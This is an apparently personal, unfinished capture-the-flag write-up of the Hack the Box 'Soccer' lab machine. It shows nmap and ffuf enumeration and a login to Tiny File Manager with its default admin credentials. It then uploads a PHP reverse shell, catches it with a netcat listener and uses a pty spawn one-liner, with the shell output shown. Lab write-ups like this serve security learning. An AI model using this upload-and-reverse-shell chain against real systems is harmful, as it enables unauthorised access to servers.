Security
Hack the Box – Soccer
date
Apr 7, 2023
slug
htb-soccer
author
status
Public
tags
Capture the Flag
WebApp Test
summary
An easy machine that uses basic web app enumeration, as well as CMS exploitation and reverse shell.
type
Post
thumbnail
_(4).png?table=block&id=992f56b4-287d-419a-9b60-ec045038c305&cache=v2)
category
Security
updatedAt
Apr 7, 2023 06:55 AM
NOTE: the following is very WIP/incomplete, will be edited and continued later. This is just my basic thoughts as I run through the challenge.
IP for this box is
10.10.11.194start with a nmap
└─$ sudo nmap -sC -sV -T4 10.10.11.194
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 01:10 EDT
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 01:10 (0:00:12 remaining)
Nmap scan report for 10.10.11.194
Host is up (0.041s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
| 256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
|_ 256 5797565def793c2fcbdb35fff17c615c (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
9091/tcp open xmltec-xmlmail?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix:
| HTTP/1.1 400 Bad Request
| Connection: close
| GetRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 139
| Date: Fri, 07 Apr 2023 05:10:27 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot GET /</pre>
| </body>
| </html>
| HTTPOptions, RTSPRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Date: Fri, 07 Apr 2023 05:10:27 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot OPTIONS /</pre>
| </body>
|_ </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9091-TCP:V=7.93%I=7%D=4/7%Time=642FA5BF%P=x86_64-pc-linux-gnu%r(inf
SF:ormix,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\
SF:n\r\n")%r(drda,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x2
SF:0close\r\n\r\n")%r(GetRequest,168,"HTTP/1\.1\x20404\x20Not\x20Found\r\n
SF:Content-Security-Policy:\x20default-src\x20'none'\r\nX-Content-Type-Opt
SF:ions:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nCon
SF:tent-Length:\x20139\r\nDate:\x20Fri,\x2007\x20Apr\x202023\x2005:10:27\x
SF:20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=
SF:\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</title>\n</h
SF:ead>\n<body>\n<pre>Cannot\x20GET\x20/</pre>\n</body>\n</html>\n")%r(HTT
SF:POptions,16C,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Poli
SF:cy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r
SF:\nDate:\x20Fri,\x2007\x20Apr\x202023\x2005:10:27\x20GMT\r\nConnection:\
SF:x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<met
SF:a\x20charset=\"utf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Ca
SF:nnot\x20OPTIONS\x20/</pre>\n</body>\n</html>\n")%r(RTSPRequest,16C,"HTT
SF:P/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-sr
SF:c\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20t
SF:ext/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Fri,\x
SF:2007\x20Apr\x202023\x2005:10:27\x20GMT\r\nConnection:\x20close\r\n\r\n<
SF:!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<meta\x20charset=\"ut
SF:f-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\x
SF:20/</pre>\n</body>\n</html>\n")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20Bad\
SF:x20Request\r\nConnection:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP,2F,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r
SF:(DNSStatusRequestTCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnecti
SF:on:\x20close\r\n\r\n")%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\
SF:nConnection:\x20close\r\n\r\n")%r(SSLSessionReq,2F,"HTTP/1\.1\x20400\x2
SF:0Bad\x20Request\r\nConnection:\x20close\r\n\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.52 secondsopen ports:
- 22 | ssh
- 80 | http
- 9091 | xmltec-xmlmail?
go to the website
sudo nano /etc/hostsadd the following line at the end
sudo nano /etc/hosts
now we have access to the website
didn’t find anything interesting on the website or in the page source
Let's try to brute force the directories?
I’ll use ffuf with the seclist raft-medium directory word list to brute force
$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://soccer.htb/FUZZit found a directory called “tiny”
got to http://soccer.htb/tiny/ it shows the following page
the login page is using tinyfilemanger from following GitHub project
prasathmani/tinyfilemanager
Looking at the GitHub documentation for it, the default username and passwords are
Default username/password: admin/admin@123 and user/12345.
✅ admin/admin@123 works. Seems to have left the admin credentials as default.
After looking around, I found out you can upload to different parts of the webpage by going to that directory/page and clicking the upload button on the top right.
In the “tiny” directory, there’s a directory called “upload” in which I can upload items.
Thinkin’ for a bit, I’ll then download the PHP reverse shell from pentestmonkey.
After that, I edit the PHP reverse shell file that I just downloaded.
I change the default IP to my IP, which is 10.10.14.63
I upload the php-reverse-shell.php file to the /var/www/html/tiny/uploads
I have the file on the server now
Since i kept the port the as defualt, i’ll use the following command
nc -nvlp 1234While listening to that port, I’ll open the php-reverse-shell
└─$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.14.63] from (UNKNOWN) [10.10.11.194] 37406
Linux soccer 5.4.0-135-generic #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
06:03:50 up 1:06, 0 users, load average: 0.07, 0.03, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned offUsing the following, I’ll dig through to find anything of use
python3 -c "import pty;pty.spawn('/bin/bash');”$ python3 -c "import pty;pty.spawn('/bin/bash');"
www-data@soccer:/$ pwd
pwd
/
www-data@soccer:/$ ls
ls
bin dev lib libx32 mnt root snap tmp var
boot etc lib32 lost+found opt run srv usr
data home lib64 media proc sbin sys vagrant
www-data@soccer:/$ whoami
whoami
www-data
www-data@soccer:/$ cd home
cd home
www-data@soccer:/home$ ls
ls
player
www-data@soccer:/home$ cd player
cd player
www-data@soccer:/home/player$ ls
ls
user.txt
www-data@soccer:/home/player$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@soccer:/home/player$ ls -la
ls -la
total 28
drwxr-xr-x 3 player player 4096 Nov 28 22:12 .
drwxr-xr-x 3 root root 4096 Nov 17 09:25 ..
lrwxrwxrwx 1 root root 9 Nov 17 09:02 .bash_history -> /dev/null
-rw-r--r-- 1 player player 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 player player 3771 Feb 25 2020 .bashrc
drwx------ 2 player player 4096 Nov 17 09:00 .cache
-rw-r--r-- 1 player player 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 Nov 17 09:02 .viminfo -> /dev/null
-rw-r----- 1 root player 33 Apr 7 04:58 user.txt